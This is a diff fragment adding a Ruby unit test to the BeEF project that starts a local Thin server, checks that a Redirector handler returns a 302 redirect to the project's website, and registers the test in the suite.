+    config[:Port] = @port.to_s
+    @mounts = {}
+    @mounts['/test'] = BeEF::Core::NetworkStack::Handlers::Redirector.new('http://www.beefproject.com')
+    @rackApp = Rack::URLMap.new(@mounts)
+    Thin::Logging.silent = true
+    @server = Thin::Server.new('127.0.0.1', @port.to_s, @rackApp)
+    trap("INT") { @server.stop }
+    trap("TERM") { @server.stop }
+
+    @pid = fork do
+      @server.start!
+    end
+  end
+
+  def teardown
+    Process.kill("INT",@pid)
+    $root_dir = nil
+  end
+
+  # the server doesn't offer a mutex or callback
+  def wait_for_server
+    max_waits = 3
+    sleep_length = 0.1
+
+    count = 0
+    while (count < max_waits)
+      break if @server.running?
+      count += 1
+      sleep sleep_length
+    end
+  end
+
+  def test_get
+    wait_for_server
+    response = Curl::Easy.http_get("http://127.0.0.1:" + @port.to_s + "/test/")
+    assert_equal 302, response.response_code
+    assert_equal "302 found", response.body_str
+    assert_match /Location: http:\/\/www\.beefproject\.com/, response.header_str
+  end
+
+end

test/unit/ts_unit.rb

@@ -9,6 +9,7 @@ require '../common/ts_common'
 
 require './core/filter/tc_base'
 require './core/filter/tc_command'
+require './core/main/network_stack/handlers/redirector'
 require './core/tc_loader'
 require './core/tc_core'
 require './core/tc_api'
@@ -53,6 +54,7 @@ class TS_BeefTests
     suite << TC_Hackverter.suite
     suite << TC_EventLogger.suite
 	suite << TC_Hooks.suite
+    suite << TC_Redirector.suite
 
     return suite
   end